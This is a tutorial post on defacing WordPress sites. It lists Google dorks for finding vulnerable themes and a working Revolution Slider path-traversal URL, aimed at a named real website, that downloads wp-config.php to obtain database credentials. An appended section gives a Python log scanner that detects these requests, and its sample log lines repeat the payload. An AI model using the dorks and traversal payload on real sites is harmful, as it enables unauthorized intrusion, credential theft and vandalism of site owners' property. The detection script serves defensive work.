
Deface Wordpress Theme Arbitrary File Download Vulnerability

Assalamuallaikum :D
This time I want to share a tutorial on defacing via Arbitrary File Download.
Really it comes down to how we work the dork until we get a website's wp-config.php
and its database host is not localhost :D


(Andela again, Rul? Eh, whatever, these are my girls :v savage)
Moving on.

Google Dork:
"Index of" +/wp-content/themes/cuckootap/
"Index of" +/wp-content/themes/IncredibleWP/
"Index of" +/wp-content/themes/ultimatum/
"Index of" +/wp-content/themes/medicate/
"Index of" +/wp-content/themes/Centum/
"Index of" +/wp-content/themes/Avada/
"Index of" +/wp-content/themes/striking_r/
"Index of" +/wp-content/themes/beach_apollo/

(If you want to get a lot of websites, develop the dork further :D)

Exploit/PoC:
http://jkt48.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php 

until you get something like this:





Tags:
Deface Multiple WordPress Themes
Multiple WordPress Themes (admin-ajax.php, img param) - Arbitrary File Download
Deface Arbitrary File Download
Deface Mass Arbitrary 

Content Creator : Syahrul Ramadhan
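
From the defender's side, the request shape shown in the PoC above is easy to find in web server access logs. The following is an added example, not part of the original post: it assumes Combined Log Format, and the function names, sample log lines and IP addresses are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip - user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif")

def suspicious_revslider_request(line):
    """Return a finding dict if the log line is a revslider_show_image
    request whose img parameter is not a plain image path, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, _method, target, status, _size = m.groups()
    url = urlsplit(target)
    if not url.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    query = parse_qs(url.query)  # percent-decodes names and values
    if "revslider_show_image" not in query.get("action", []):
        return None
    for img in query.get("img", []):
        traversal = ".." in img.replace("\\", "/").split("/")
        non_image = not img.lower().endswith(IMAGE_EXT)
        if traversal or non_image or img.startswith("/"):
            # A 200 response means the file may have been served.
            return {"ip": ip, "img": img, "served": status == "200"}
    return None

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2015:10:00:00 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3120',
    '192.0.2.11 - - [01/Jan/2015:10:00:05 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php HTTP/1.1" 404 0',
    '198.51.100.7 - - [01/Jan/2015:10:01:00 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=uploads/banner.jpg HTTP/1.1" 200 48211',
    '198.51.100.8 - - [01/Jan/2015:10:02:00 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 58',
]

def scan(lines):
    """Return the findings for every suspicious line, in input order."""
    return [f for f in map(suspicious_revslider_request, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with `served` set to true means the contents of wp-config.php may have left the server, so the database credentials and salts in it should be treated as exposed and rotated, which matters most when the database host is reachable from outside. The check only sees parameters in the request line, so requests that carry them in a POST body need body logging or a WAF rule instead.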

